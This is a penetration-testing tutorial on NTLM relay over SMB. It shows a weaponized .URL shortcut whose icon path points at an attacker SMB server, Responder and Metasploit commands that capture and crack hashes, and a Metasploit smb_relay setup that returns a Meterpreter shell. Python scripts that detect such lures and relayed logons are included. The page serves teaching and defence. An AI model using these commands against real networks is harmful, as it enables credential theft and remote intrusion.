
NTLM Relay via SMB


Last updated 9 months ago

SMB is a protocol which is widely used across organisations for file sharing purposes. It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings.

However, even if a file share doesn't contain any data that could be used to connect to other systems, if it is configured with write permissions for unauthenticated users then it is possible to obtain password hashes of domain users or Meterpreter shells.

Let's walk through an example that uses .URL shortcut files.

Execution via .URL

Create a weaponized .url file and upload it to the victim system:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.0.37\%USERNAME%.icon
IconIndex=1

Create a listener on the attacking system:

responder -I eth1 -v

There is an alternative to Responder: the Metasploit Framework has a module that can be used to capture challenge-response password hashes from SMB clients:

auxiliary/server/capture/smb

Once the victim accesses the file share, the OS tries to authenticate to the attacker's malicious SMB listener on 192.168.0.37. The NTLMv2-SSP hash is sent and captured.

Next, we can proceed to crack this NTLMv2-SSP hash using john.

Why does it authenticate automatically?

When parsing a shortcut, Windows reads its contents to determine the properties of the shortcut, including where the linked resource is and what icon should represent it.

If the .URL file specifies an icon file located on a network resource (as in the example above), Windows will attempt to access the network location to retrieve the icon. This is where the automatic behaviour comes into play:

  • Network request: Windows makes a network request to the specified server (the attacker's SMB server).

  • Authentication: Since it is a network resource, Windows will try to authenticate to the server using the available credentials. This is typically handled with NTLM authentication if Kerberos is not configured (or cannot be used, as when the server is addressed by IP rather than by name).

  • Display: Once the icon is retrieved, it is displayed in the shortcut's place in File Explorer.
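A defender can turn the mechanism described above into a check: any .URL file on a share whose IconFile, URL or WorkingDirectory resolves to a UNC path on a host outside an allow-list is a forced-authentication lure candidate. The script below is an added example, not code from the original page or its author; the allow-list TRUSTED_UNC_HOSTS and both sample shortcut files are constructed for illustration (the malicious one reproduces the .URL shown earlier on this page).

```python
import configparser
import re
from pathlib import Path

# Assumed allow-list of hosts that may legitimately serve icons or link targets
# over UNC; a real deployment would load this from an asset inventory.
TRUSTED_UNC_HOSTS = {"fileserver01", "fileserver01.cyberrange.com"}

# Matches the host portion of a UNC path such as \\host\share\file
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")

# Constructed sample: the weaponized shortcut shown earlier on this page
MALICIOUS_URL_FILE = r"""[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.0.37\%USERNAME%.icon
IconIndex=1
"""

# Constructed sample: a benign shortcut to an intranet site
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://intranet.cyberrange.com/
IconFile=\\fileserver01\icons\intranet.ico
IconIndex=0
"""


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys, lower-cased, or {} if unparseable."""
    # interpolation=None so a literal %USERNAME% does not trip configparser
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}
    if "InternetShortcut" not in parser:
        return {}
    return dict(parser["InternetShortcut"].items())


def unc_host(value: str):
    """Return the lower-cased host of a UNC path, or None if not a UNC path."""
    match = UNC_HOST_RE.match(value.strip())
    return match.group(1).lower() if match else None


def assess_shortcut(text: str) -> list:
    """List the reasons a .URL file looks like a forced-authentication lure."""
    props = parse_url_file(text)
    findings = []
    for key in ("iconfile", "url", "workingdirectory"):
        value = props.get(key, "")
        host = unc_host(value)
        if host and host not in TRUSTED_UNC_HOSTS:
            findings.append(f"{key} points at untrusted UNC host {host}: {value}")
    if "%username%" in props.get("iconfile", "").lower():
        findings.append("iconfile embeds %USERNAME%, so each victim fetches a per-user path")
    return findings


def scan_tree(root: Path) -> dict:
    """Map each suspicious .URL path under root to its findings."""
    results = {}
    for path in root.rglob("*"):
        if path.suffix.lower() != ".url" or not path.is_file():
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings = assess_shortcut(text)
        if findings:
            results[str(path)] = findings
    return results


if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, assess_shortcut(sample) or "clean")
```

Run scan_tree against a mounted copy of the share (for example scan_tree(Path("/mnt/public"))) to list every flagged shortcut; the same parse-and-allow-list approach extends to .LNK and .SCF files, which carry icon paths in a different format.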

More relays

Let's assume we have two machines, and the user on victim1 is able to authenticate to the victim2 machine.

We can relay the victim1 hash to victim2 and return a meterpreter shell.

First, launch msfconsole and configure the relay module, where 192.168.0.50 is victim2 and public is a writable share on victim2:

use exploit/windows/smb/smb_relay
set payload windows/x64/meterpreter/reverse_tcp
set relay_targets 192.168.0.50
set smbdomain cyberrange.com
set smbshare public
exploit

After victim1 opens the share containing the malicious .URL file, its NTLM authentication is relayed to victim2 and the Meterpreter session is returned.
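On the relay target (victim2 above), the relayed logon leaves a distinctive trace: the Security log records a 4624 network logon (type 3) with the NTLM package whose Workstation Name is the real client (victim1, because the relay forwards the client's own NTLM messages) but whose Source Network Address is the relay host. The script below is an added detection example, not code from the original page or its author; the asset inventory INVENTORY and the sample events in EVENTS are constructed for illustration, using the addresses from this page.

```python
from collections import defaultdict

# Assumed asset inventory: workstation name -> addresses it is known to use.
# Constructed for this example; a real one comes from DHCP or CMDB data.
INVENTORY = {
    "VICTIM1": {"192.168.0.10"},
    "VICTIM2": {"192.168.0.50"},
    "DC01": {"192.168.0.1"},
}

# Constructed sample Security-log events (subset of 4624 fields)
EVENTS = [
    # Normal: VICTIM1's user reaches DC01 from VICTIM1's own address
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "TargetDomainName": "CYBERRANGE",
     "WorkstationName": "VICTIM1", "IpAddress": "192.168.0.10",
     "Computer": "DC01.cyberrange.com"},
    # Relayed: the NTLM message still names VICTIM1, but the TCP connection
    # to VICTIM2 came from the relay host
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "TargetDomainName": "CYBERRANGE",
     "WorkstationName": "VICTIM1", "IpAddress": "192.168.0.37",
     "Computer": "VICTIM2.cyberrange.com"},
    # Kerberos network logon: not subject to this heuristic
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "bob", "TargetDomainName": "CYBERRANGE",
     "WorkstationName": "-", "IpAddress": "192.168.0.50",
     "Computer": "DC01.cyberrange.com"},
    # Interactive logon at the console: not a network logon
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "Negotiate",
     "TargetUserName": "bob", "TargetDomainName": "CYBERRANGE",
     "WorkstationName": "VICTIM2", "IpAddress": "127.0.0.1",
     "Computer": "VICTIM2.cyberrange.com"},
]

# Addresses that carry no useful source information
LOCAL_ADDRESSES = {"-", "", "127.0.0.1", "::1"}


def is_ntlm_network_logon(event: dict) -> bool:
    """True for a 4624 with logon type 3 and the NTLM authentication package."""
    return (event.get("EventID") == 4624
            and event.get("LogonType") == 3
            and str(event.get("AuthenticationPackageName", "")).upper() == "NTLM")


def find_relay_candidates(events, inventory) -> list:
    """Return (event, reason) pairs where the NTLM client name and source IP disagree."""
    alerts = []
    for event in events:
        if not is_ntlm_network_logon(event):
            continue
        workstation = str(event.get("WorkstationName", "")).upper().rstrip("$")
        ip = event.get("IpAddress", "")
        if ip in LOCAL_ADDRESSES or workstation in ("", "-"):
            continue
        expected = inventory.get(workstation)
        if expected is None:
            alerts.append((event, f"workstation {workstation} is not in the inventory"))
        elif ip not in expected:
            alerts.append((event, f"{ip} is not a known address of {workstation}"))
    return alerts


def users_per_source(events) -> dict:
    """Count distinct accounts seen in NTLM network logons from each source IP.

    A single address authenticating as many different users is a second signal
    that it is relaying other machines' credentials rather than its own.
    """
    seen = defaultdict(set)
    for event in events:
        if is_ntlm_network_logon(event):
            seen[event.get("IpAddress", "")].add(event.get("TargetUserName", ""))
    return {ip: len(users) for ip, users in seen.items()}


if __name__ == "__main__":
    for event, reason in find_relay_candidates(EVENTS, INVENTORY):
        print(f"{event['Computer']}: {event['TargetUserName']} from "
              f"{event['WorkstationName']} ({event['IpAddress']}) - {reason}")
    print(users_per_source(EVENTS))
```

In production the events would come from a SIEM query for Event ID 4624 rather than a literal list, and the inventory lookup should tolerate DHCP churn (a short grace window after a lease change) to keep the mismatch rule from firing on every re-addressed laptop. The heuristic complements, rather than replaces, the configuration fixes that remove the relay path altogether (SMB signing and, where possible, disabling NTLM).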

Author

Ik0nw

Interview Question

1) Other than abusing .URL files, what other methods can force authentication to SMB?

2) What are the ways to defend against SMB relay attacks?

3) Explain why the victim is able to automatically access the attacker's SMB share just by opening the share.

4) How do you defend against such attacks?

5) Is SMB relay able to relay the hash back to the victim itself?

Responder
Metasploit smb capture